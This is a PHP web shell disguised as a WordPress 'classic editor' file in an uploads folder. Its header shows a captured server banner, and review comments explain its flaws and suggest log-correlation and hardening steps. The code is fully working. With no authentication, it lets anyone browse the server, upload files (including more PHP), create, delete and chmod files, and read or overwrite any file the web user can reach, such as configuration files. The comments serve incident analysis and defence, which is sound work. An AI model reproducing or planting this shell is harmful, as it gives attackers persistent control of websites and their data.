HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.4.33
System: Linux webkhoa.212 3.10.0-1160.59.1.el7.x86_64 #1 SMP Wed Feb 23 16:47:03 UTC 2022 x86_64
User: fect (1004)
PHP: 7.4.33
Disabled: NONE
File: /home/fect/web/fect.ictu.edu.vn/public_html/wp-content/uploads/2025/08/wp-classic-editor.php
<?php
// ====================
// WP Head Editor + Advanced File Manager (Free Navigation)
// ====================
//
// Review note: every action in this script is driven directly by $_GET,
// $_POST and $_FILES, and no login, session, token or source-address check
// appears before any of them. Whoever can reach the URL gets browse, upload,
// create, delete, chmod and overwrite access with the privileges of the PHP
// process user.
//
// Log-review aid: the request parameters read by this script are
//   GET : path, up, delete, edit
//   POST: upload (+ multipart field "file"), newfile/filename,
//         newfolder/foldername, chmod/perm/target, save/content
// Requests to a PHP file carrying these names are worth correlating in the
// web server access log.
//
// Hardening that addresses this class of file: deny PHP execution inside
// upload directories and alert on newly created *.php files there.

// Default starting path is the folder the script lives in; a caller-supplied
// "path" query parameter replaces it without being confined to any base
// directory.
$path = isset($_GET['path']) ? $_GET['path'] : __DIR__;
// realpath() resolves symlinks and "..", and returns false for a path that
// does not exist or cannot be resolved.
$real_path = realpath($path);

// If the requested path is invalid, stay in the script's own folder.
if ($real_path === false) {
    $real_path = __DIR__;
}

// "Up Folder" was clicked: move to the parent of the resolved path.
// Nothing stops this from climbing above the web root.
if (isset($_GET['up'])) {
    $real_path = dirname($real_path);
}

// Action: upload a file into the current directory ($real_path).
// Review note: there is no check on extension, MIME type, size or caller
// identity, so any content (including further PHP) can be written wherever
// the PHP process user has write access.
if (isset($_POST['upload']) && isset($_FILES['file'])) {
    // basename() strips directory components from the client-supplied name,
    // so the file lands directly inside $real_path; an existing file with
    // the same name is not checked for before the move.
    $target = $real_path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo "<div style='color:green'>File uploaded successfully.</div>";
    } else {
        echo "<div style='color:red'>Upload failed.</div>";
    }
}

// Action: create a new empty file in the current directory.
if (isset($_POST['newfile']) && !empty($_POST['filename'])) {
    // Review note: unlike the upload branch, "filename" is concatenated
    // as-is (no basename()), so separators or ".." in the value are passed
    // straight to the filesystem call.
    $newfile = $real_path . DIRECTORY_SEPARATOR . $_POST['filename'];
    // Existing paths are left untouched, and no message is printed for them.
    if (!file_exists($newfile)) {
        // The return value is ignored; the success message below is printed
        // even if the write failed.
        file_put_contents($newfile, "");
        echo "<div style='color:green'>File created.</div>";
    }
}

// Action: create a new folder in the current directory.
if (isset($_POST['newfolder']) && !empty($_POST['foldername'])) {
    // Review note: "foldername" is concatenated as-is (no basename()), so
    // separators or ".." in the value are passed straight to mkdir().
    $newfolder = $real_path . DIRECTORY_SEPARATOR . $_POST['foldername'];
    if (!file_exists($newfolder)) {
        // mkdir() is called with its defaults (non-recursive); its return
        // value is ignored, so the success message is printed regardless.
        mkdir($newfolder);
        echo "<div style='color:green'>Folder created.</div>";
    }
}

// Action: delete a file or folder.
// Review note: this is a state-changing operation triggered by a plain GET
// request, and the target is resolved on its own, independent of $real_path,
// so any path the PHP process user may remove is accepted.
if (isset($_GET['delete'])) {
    // realpath() returns false for a non-existent path, which skips the branch.
    $del = realpath($_GET['delete']);
    if ($del) {
        if (is_file($del)) {
            // The return value is ignored; the message is printed either way.
            unlink($del);
            echo "<div style='color:green'>File deleted.</div>";
        } elseif (is_dir($del)) {
            // rmdir() only removes empty directories; a failure here is not
            // reported because the return value is ignored.
            rmdir($del);
            echo "<div style='color:green'>Folder deleted.</div>";
        }
    }
}

// Action: change the permission bits of a file or folder.
if (isset($_POST['chmod']) && isset($_POST['perm']) && isset($_POST['target'])) {
    // The target is resolved on its own, independent of $real_path.
    $t = realpath($_POST['target']);
    // "perm" is parsed as an octal number (base 8), e.g. the text "0644".
    $perm = intval($_POST['perm'], 8);
    if ($t) {
        // The return value is ignored; the message is printed even when
        // chmod() fails.
        chmod($t, $perm);
        echo "<div style='color:green'>Permission updated.</div>";
    }
}

// Render the directory listing and the action forms when the resolved path
// is a folder.
if (is_dir($real_path)) {
    $files = scandir($real_path);
    echo "<h2>WP Head Editor - File Manager</h2>";
    echo "<h3>Current Path: " . htmlspecialchars($real_path) . "</h3>";
    echo "<a href='?path=" . urlencode($real_path) . "&up=1'>[Up Folder]</a><br><br>";

    // Upload form. None of the forms below set an action attribute, so they
    // post back to the current URL and keep its query string.
    echo "<form method='post' enctype='multipart/form-data'>
        Upload: <input type='file' name='file'>
        <button type='submit' name='upload'>Upload</button>
    </form><br>";

    // New-file form.
    echo "<form method='post'>
        New File: <input type='text' name='filename'>
        <button type='submit' name='newfile'>Create</button>
    </form><br>";

    // New-folder form.
    echo "<form method='post'>
        New Folder: <input type='text' name='foldername'>
        <button type='submit' name='newfolder'>Create</button>
    </form><br><br>";

    foreach ($files as $file) {
        // Skip the self entry; ".." is kept and listed like any other folder.
        if ($file == '.') continue;
        $filepath = $real_path . DIRECTORY_SEPARATOR . $file;
        // Last four octal digits of the mode, e.g. "0644".
        $perm = substr(sprintf('%o', fileperms($filepath)), -4);

        // Review note: $file is interpolated into the HTML below without
        // htmlspecialchars(), so a file name containing markup is rendered
        // as markup in the listing.
        if (is_dir($filepath)) {
            echo "<a href='?path=" . urlencode($filepath) . "'>[DIR] $file</a> ";
            echo "<a href='?delete=" . urlencode($filepath) . "' style='color:red'>[Delete]</a> ";
        } else {
            echo "<a href='?edit=" . urlencode($filepath) . "'>$file</a> ";
            echo "<a href='?delete=" . urlencode($filepath) . "' style='color:red'>[Delete]</a> ";
        }

        // Inline chmod form, one per entry. The hidden "target" value sits in
        // a single-quoted attribute; htmlspecialchars() with default flags
        // leaves single quotes unescaped on PHP versions before 8.1.
        echo "<form method='post' style='display:inline'>
            <input type='hidden' name='target' value='" . htmlspecialchars($filepath) . "'>
            <input type='text' name='perm' value='$perm' size='4'>
            <button type='submit' name='chmod'>Chmod</button>
        </form><br>";
    }
}

// File edit mode: show a file's contents in a textarea and optionally
// overwrite it.
// Review note: the target comes straight from the "edit" query parameter and
// is not confined to any directory, so every file the PHP process user can
// read is displayed, and every file it can write can be replaced. On a CMS
// host this includes configuration and template files.
if (isset($_GET['edit'])) {
    $edit_file = realpath($_GET['edit']);
    if ($edit_file && is_file($edit_file)) {
        if (isset($_POST['save'])) {
            // The posted "content" replaces the whole file. The field is not
            // checked with isset(), and the return value is ignored, so the
            // success message is printed even when the write fails.
            file_put_contents($edit_file, $_POST['content']);
            echo "<div style='color:green'>File saved successfully.</div>";
        }

        // Re-read the file after any save and escape it for display.
        $content = htmlspecialchars(file_get_contents($edit_file));
        echo "<h2>Editing: " . htmlspecialchars($edit_file) . "</h2>";
        echo "<form method='post'>";
        echo "<textarea name='content' style='width:100%;height:400px;'>$content</textarea><br>";
        echo "<button type='submit' name='save'>Save</button>";
        echo "</form>";
        echo "<br><a href='?path=" . urlencode(dirname($edit_file)) . "'>Back to folder</a>";
    } else {
        // Reached when the path does not resolve or is not a regular file.
        echo "<div style='color:red'>Invalid file.</div>";
    }
}
?>